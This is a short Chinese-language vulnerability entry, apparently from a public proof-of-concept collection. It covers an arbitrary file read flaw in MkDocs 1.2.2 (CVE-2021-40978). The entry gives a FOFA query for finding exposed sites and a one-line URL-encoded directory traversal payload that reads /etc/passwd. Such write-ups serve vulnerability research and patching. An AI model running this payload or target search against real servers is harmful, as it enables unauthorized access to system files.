Awesome-POC/Web应用漏洞/MKdocs 任意文件读取漏洞 CVE-2021-40978.md

31 lines
430 B
Markdown
Raw Normal View History

2022-05-24 17:29:00 +08:00
# MKdocs 任意文件读取漏洞 CVE-2021-40978
## 漏洞描述
MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件
## 漏洞影响
```
Mkdocs 1.2.2
```
## FOFA
```
title="My Docs"
```
## 漏洞复现
主页面
2022-12-05 11:09:28 +08:00
![image-20220524152422662](./images/202205241524715.png)
2022-05-24 17:29:00 +08:00
验证POC
```
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```
2022-12-05 11:09:28 +08:00
![image-20220524152444205](./images/202205241524264.png)